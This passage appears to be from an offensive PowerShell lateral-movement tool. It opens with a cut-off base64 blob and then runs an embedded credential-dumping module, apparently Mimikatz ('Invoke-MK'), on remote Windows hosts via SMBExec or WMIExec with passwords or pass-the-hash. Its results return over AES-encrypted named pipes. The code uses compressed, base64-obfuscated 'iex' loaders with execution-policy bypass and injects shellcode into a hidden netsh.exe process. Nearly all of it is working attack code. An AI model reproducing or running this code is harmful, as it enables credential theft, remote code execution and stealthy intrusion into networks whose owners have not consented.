J1aWxkZXJBY2Nlc3NdOjpSdW4pDQoJCSRNb2R1bGVCdWlsZGVyID0gJEFzc2VtYmx5QnVpbGRlci5EZWZpbmVEeW5hbWljTW9kdWxlKCdEeW5hbWljTW9kdWxlJywgJGZhbHNlKQ0KCQkkQ29uc3RydWN0b3JJbmZvID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsQXNBdHRyaWJ1dGVdLkdldENvbnN0cnVjdG9ycygpWzBdDQoNCg0KCQkjIyMjIyMjIyMjIyMgICAgRU5VTSAgICAjIyMjIyMjIyMjIyMNCgkJI0VudW0gTWFjaGluZVR5cGUNCgkJJFR5cGVCdWlsZGVyID0gJE1vZHVsZUJ1aWxkZXIuRGVmaW5lRW51bSgnTWFjaGluZVR5cGUnLCAnUHVibGljJywgW1VJbnQxNl0pDQoJCSRUeXBlQnVpbGRlci5EZWZpbmVMaXRlcmFsKCdOYXRpdmUnLCBbVUludDE2XSAwKSB8IE91dC1OdWxsDQoJCSRUeXBlQnVpbGRlci5EZWZpbmVMaXRlcmFsKCdJMzg2JywgW1VJbnQxNl0gMHgwMTRjKSB8IE91dC1OdWxsDQoJCSRUeXBlQnVpbGRlci5EZWZpbmVMaXRlcmFsKCdJdGFuaXVtJywgW1VJbnQxNl0gMHgwMjAwKSB8IE91dC1OdWxsDQoJCSRUeXBlQnVpbGRlci5EZWZpbmVMaXRlcmFsKCd4NjQnLCBbVUludDE2XSAweDg2NjQpIHwgT3V0LU51bGwNCgkJJE1hY2hpbmVUeXBlID0gJFR5cGVCdWlsZGVyLkNyZWF0ZVR5cGUoKQ0KCQkkV2luMzJUeXBlcyB8IEFkZC1NZW1iZXIgLU1lbWJlclR5cGUgTm90ZVByb3BlcnR5IC1OYW1lIE1hY2hpbmVUeXBlIC1WYWx1ZSAkTWFjaGluZVR5cGUNCg0KCQkjRW51bSBNYWdpY1R5cGUNCgkJJFR5cGVCdWlsZGVyID0gJE1vZHVsZUJ1aWxkZXIuRGVmaW5lRW51bSgnTWFnaWNUeXBlJywgJ1B1YmxpYycsIFtVSW50MTZdKQ0KCQkkVHlwZUJ1aWxkZXIuRGVmaW5lTGl0ZXJhbCgnSU1BR0VfTlRfT1BUSU9OQUxfSERSMzJfTUFHSUMnLCBbVUludDE2XSAweDEwYikgfCBPdXQtTnVsbA0KCQkkVHlwZUJ1aWxkZXIuRGVmaW5lTGl0ZXJhbCgnSU1BR0VfTlRfT1BUSU9OQUxfSERSNjRfTUFHSUMnLCBbVUludDE2XSAweDIwYikgfCBPdXQtTnVsbA0KCQkkTWFnaWNUeXBlID0gJFR5cGVCdWlsZGVyLkNyZWF0ZVR5cGUoKQ0KCQkkV2luMzJUeXBlcyB8IEFkZC1NZW1iZXIgLU1lbWJlclR5cGUgTm90ZVByb3BlcnR5IC1OYW1lIE1hZ2ljVHlwZSAtVmFsdWUgJE1hZ2ljVHlwZQ0KDQoJCSNFbnVtIFN1YlN5c3RlbVR5cGUNCgkJJFR5cGVCdWlsZGVyID0gJE1vZHVsZUJ1aWxkZXIuRGVmaW5lRW51bSgnU3ViU3lzdGVtVHlwZScsICdQdWJsaWMnLCBbVUludDE2XSkNCgkJJFR5cGVCdWlsZGVyLkRlZmluZUxpdGVyYWwoJ0lNQUdFX1NVQlNZU1RFTV9VTktOT1dOJywgW1VJbnQxNl0gMCkgfCBPdXQtTnVsbA0KCQkkVHlwZUJ1aWxkZXIuRGVmaW5lTGl0ZXJhbCgnSU1BR0VfU1VCU1lTVEVNX05BVElWRScsIFtVSW50MTZdIDEpIHwgT3V0LU51bGwNCgkJJFR5cGVCdWlsZGVyLkRlZmluZUxpdGVy
if ( ! $Command ) {
$Command = " Invoke-MK "
} else {
$Command = " Invoke-MK -Command $Command "
}
if ( ! $Shellcode ) {
if ( ! $Target -or ( $Target -eq " localhost " ) ) {
$Target = " localhost "
$postcode = @"
`$ key = " $pipekey "
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
`$ Output = $Command
`$ Payload = Encrypt-String -unencryptedString `$ Output -Key `$ key
`$ pipename = " $pipeNameMimi "
`$ scriptblock =
{
param ( `$ PipeName , `$ Payload )
add-Type -assembly " System.Core "
`$ PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
`$ AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ PipeSecurity . AddAccessRule ( `$ AccessRule )
`$ Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ PipeName , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ PipeSecurity )
`$ pipe . WaitForConnection ( ) ;
`$ pipeWriter = new-object System . IO . StreamWriter ( `$ pipe )
`$ pipeWriter . AutoFlush = `$ true
`$ pipeWriter . WriteLine ( `$ Payload ) ;
`$ pipe . Dispose ( ) ;
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ scriptblock -ArgumentList @ ( `$ pipeName , `$ Payload )
`$ pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pipeName ) ;
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $mk ) )
$mkun + = $postcode
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$EncodedData = [ Convert ] :: ToBase64String ( $Bytes )
$scriptblock =
{
param ( $PipeName , $Payload )
add-Type -assembly " System.Core "
$PipeSecurity = New-Object System . IO . Pipes . PipeSecurity
$AccessRule = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
$PipeSecurity . AddAccessRule ( $AccessRule )
$Pipe = New-Object System . IO . Pipes . NamedPipeServerStream ( $PipeName , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , $PipeSecurity )
$pipe . WaitForConnection ( ) ;
$pipenReader = new-object System . IO . StreamReader ( $pipe )
$pipeWriter = new-object System . IO . StreamWriter ( $pipe )
$pipeWriter . AutoFlush = $true
$pipeWriter . WriteLine ( $Payload ) ;
$pipeReader . Dispose ( ) ;
$pipe . Dispose ( ) ;
}
add-Type -assembly " System.Core "
Start-Job -ScriptBlock $scriptblock -ArgumentList @ ( $pipeName , $EncodedData ) | Out-Null
$pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , $pipeName ) ;
$pspayloadnamedpipe = " add-Type -assembly `" System.Core `" ; `$ pi = new-object System.IO.Pipes.NamedPipeClientStream(' $pipeName '); `$ pi.Connect( $TimeoutMS ); `$ pr = new-object System.IO.StreamReader( `$ pi); `$ t = `$ pr.ReadLine(); `$ i=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( `$ t)); iex `$ i; "
$bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pspayloadnamedpipe )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
if ( $success -like " *Command executed* " ) {
echo " `n [+] Waiting for output from named pipe....... `n "
try {
add-Type -assembly " System.Core " ;
$pi = new-object System . IO . Pipes . NamedPipeClientStream ( " $pipeNameMimi " ) ;
$pi . Connect ( $TimeoutMS ) ; $pr = new-object System . IO . StreamReader ( $pi ) ;
$wp = $pr . ReadLine ( ) ;
$pi . Dispose ( ) ; $pr . Dispose ( ) ;
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $wp
$pl
} catch {
echo " Failed conecting to named pipe: $pipeNameMimi "
}
} else { echo " Failed to run WMI/SMBEXEC " }
} else {
if ( $Hash ) { echo " Cannot use a hash when executing shellcode remotely as it rquired the password to create a pipe session.... " ; return }
$pipekat = @"
`$ pn = " $pipeName "
`$ pm = " $pipeNameMimi "
`$ sb =
{
param ( `$ pn , `$ pm )
add-Type -assembly " System.Core "
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pn , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pr = new-object System . IO . StreamReader ( `$ p )
`$ o = `$ pr . ReadLine ( )
`$ p . Dispose ( ) ;
`$ pr . Dispose ( ) ;
`$ s = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( `$ o ) ) | out-string
`$ o = IEX `$ s | out-string
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pm , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pw = new-object System . IO . StreamWriter ( `$ p )
`$ pw . AutoFlush = `$ true
`$ pw . WriteLine ( `$ o ) ;
`$ p . Dispose ( ) ;
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ sb -ArgumentList @ ( `$ pn , `$ pm )
`$ pl = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pn ) ;
`$ pp = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pm ) ;
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
$Bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pipekat )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $pipekat )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
if ( $success -like " *Command executed* " ) {
$postmimi = @"
`$ key = " $pipekey "
function Create-AesManagedObject
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ IV
)
`$ aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
`$ aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
`$ aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
`$ aesManaged . BlockSize = 128
`$ aesManaged . KeySize = 256
if ( `$ IV )
{
if ( `$ IV . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . IV = [ System.Convert ] :: FromBase64String ( `$ IV ) }
else
{ `$ aesManaged . IV = `$ IV }
}
if ( `$ key )
{
if ( `$ key . getType ( ) . Name -eq 'String' )
{ `$ aesManaged . Key = [ System.Convert ] :: FromBase64String ( `$ key ) }
else
{ `$ aesManaged . Key = `$ key }
}
`$ aesManaged
}
function Encrypt-String
{
param
(
[ Object ]
`$ key ,
[ Object ]
`$ unencryptedString
)
`$ bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( `$ unencryptedString )
`$ aesManaged = Create-AesManagedObject `$ key
`$ encryptor = `$ aesManaged . CreateEncryptor ( )
`$ encryptedData = `$ encryptor . TransformFinalBlock ( `$ bytes , 0 , `$ bytes . Length )
[ byte[] ] `$ fullData = `$ aesManaged . IV + `$ encryptedData
[ System.Convert ] :: ToBase64String ( `$ fullData )
}
`$ Output = $Command
Encrypt-String -unencryptedString `$ Output -Key `$ key
" @
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $mk ) )
$mkun + = $postmimi
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$ed = [ Convert ] :: ToBase64String ( $Bytes )
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $username " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $username " , " $Password " )
}
try {
add-Type -assembly " System.Core "
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeName ) ;
$w = new-object System . IO . StreamWriter ( $p )
$p . Connect ( $TimeoutMS ) ;
$w . WriteLine ( $ed ) ;
$w . Dispose ( ) ;
$p . Dispose ( ) ;
} catch {
echo " Failed conecting to named pipe: $target : $pipeName "
}
try {
add-Type -assembly " System.Core " ;
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeNameMimi ) ;
$p . Connect ( $TimeoutMS ) ;
$r = new-object System . IO . StreamReader ( $p ) ;
$rr = $r . ReadLine ( ) ;
$p . Dispose ( ) ;
$r . Dispose ( ) ;
$pl = Decrypt-String -key $pipekey -encryptedStringWithIV $rr
$pl
} catch {
echo " Failed conecting to named pipe: $target : $pipeNameMimi "
}
} else { echo " Failed to run WMI/SMBEXEC " }
}
} else {
if ( ! $Target ) {
$Target = " localhost "
}
if ( $Hash ) { echo " Cannot use a hash when executing shellcode remotely as it requires the password to create a pipe session.... " ; return }
echo " [+] Shellcode being executed "
$pipekat = @"
`$ pn = " $pipeName "
`$ sb =
{
param ( `$ pn )
add-Type -assembly " System.Core "
`$ ps = New-Object System . IO . Pipes . PipeSecurity
`$ ar = New-Object System . IO . Pipes . PipeAccessRule ( " Everyone " , " ReadWrite " , " Allow " )
`$ ps . AddAccessRule ( `$ ar )
`$ p = New-Object System . IO . Pipes . NamedPipeServerStream ( `$ pn , " InOut " , 100 , " Byte " , " None " , 1024 , 1024 , `$ ps )
`$ p . WaitForConnection ( ) ;
`$ pr = new-object System . IO . StreamReader ( `$ p )
`$ o = `$ pr . ReadLine ( )
`$ p . Dispose ( ) ;
`$ pr . Dispose ( ) ;
`$ s = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( `$ o ) ) | out-string
IEX `$ s | out-string
}
add-Type -assembly " System.Core "
`$ t = start-job -ScriptBlock `$ sb -ArgumentList @ ( `$ pn )
`$ pi = new-object System . IO . Pipes . NamedPipeClientStream ( " . " , `$ pn )
Start-Sleep $TimeoutServer
`$ t . StopJob ( )
" @
$Bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pipekat )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $pipekat )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
# example shellcode that runs netsh.exe
# $Shellcode = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1W5ldHNoLmV4ZQA="
if ( $success -like " *Command executed* " ) {
$sc32 = @"
`$ sc32 = " $Shellcode "
`$ pst = New-Object System . Diagnostics . ProcessStartInfo
`$ pst . WindowStyle = 'Hidden'
`$ pst . UseShellExecute = `$ False
`$ pst . CreateNoWindow = `$ True
if ( `$ env : PROCESSOR_ARCHITECTURE -eq " x86 " ) {
`$ t2 = [ Convert ] :: FromBase64String ( `$ sc32 )
`$ pst . FileName = " C:\Windows\System32\netsh.exe "
} else {
`$ pst . FileName = " C:\Windows\Syswow64\netsh.exe "
`$ t2 = [ Convert ] :: FromBase64String ( `$ sc32 )
}
`$ Process = [ System.Diagnostics.Process ] :: Start ( `$ pst )
`$ Process . Id
Invoke-Fsd -ProcessID `$ Process . Id -Shellcode `$ t2
" @
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $invokeshellcode ) )
$mkun + = $sc32
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$ed = [ Convert ] :: ToBase64String ( $Bytes )
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $username " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $username " , " $Password " )
}
try {
add-Type -assembly " System.Core "
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeName ) ;
$w = new-object System . IO . StreamWriter ( $p )
$p . Connect ( $TimeoutMS ) ;
$w . WriteLine ( $ed ) ;
$w . Dispose ( ) ;
$p . Dispose ( ) ;
} catch {
echo " Failed conecting to named pipe: $target : $pipeName "
}
} else { echo " Failed to run WMI/SMBEXEC " }
}
}
function Random-Pipe
{
param (
[ int ] $Length
)
$set = 'abcdefghijklmnopqrstuvwxyz0123456789' . ToCharArray ( )
$result = ''
for ( $x = 0 ; $x -lt $Length ; $x + + )
{ $result + = $set | Get-Random }
return $result
}
# creates a randon AES managed object
function Create-AesManagedObject
{
param
(
[ Object ]
$key ,
[ Object ]
$IV
)
$aesManaged = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
$aesManaged . Mode = [ System.Security.Cryptography.CipherMode ] :: CBC
$aesManaged . Padding = [ System.Security.Cryptography.PaddingMode ] :: Zeros
$aesManaged . BlockSize = 128
$aesManaged . KeySize = 256
if ( $IV )
{
if ( $IV . getType ( ) . Name -eq 'String' )
{ $aesManaged . IV = [ System.Convert ] :: FromBase64String ( $IV ) }
else
{ $aesManaged . IV = $IV }
}
if ( $key )
{
if ( $key . getType ( ) . Name -eq 'String' )
{ $aesManaged . Key = [ System.Convert ] :: FromBase64String ( $key ) }
else
{ $aesManaged . Key = $key }
}
$aesManaged
}
# creates a randon AES symetric encryption key
function Create-AesKey ( )
{
$aesManaged = Create-AesManagedObject
$aesManaged . GenerateKey ( )
[ System.Convert ] :: ToBase64String ( $aesManaged . Key )
}
# encryption utility using Rijndael encryption, an AES equivelant, returns encrypted base64 block
function Encrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$unencryptedString
)
$bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $unencryptedString )
$aesManaged = Create-AesManagedObject $key
$encryptor = $aesManaged . CreateEncryptor ( )
$encryptedData = $encryptor . TransformFinalBlock ( $bytes , 0 , $bytes . Length )
[ byte[] ] $fullData = $aesManaged . IV + $encryptedData
[ System.Convert ] :: ToBase64String ( $fullData )
}
# decryption utility using Rijndael encryption, an AES equivelant, returns unencrypted UTF8 data
function Decrypt-String
{
param
(
[ Object ]
$key ,
[ Object ]
$encryptedStringWithIV
)
$bytes = [ System.Convert ] :: FromBase64String ( $encryptedStringWithIV )
$IV = $bytes [ 0 . .15 ]
$aesManaged = Create-AesManagedObject $key $IV
$decryptor = $aesManaged . CreateDecryptor ( )
$unencryptedData = $decryptor . TransformFinalBlock ( $bytes , 16 , $bytes . Length - 16 )
[ System.Text.Encoding ] :: UTF8 . GetString ( $unencryptedData ) . Trim ( [ char ] 0 )
}
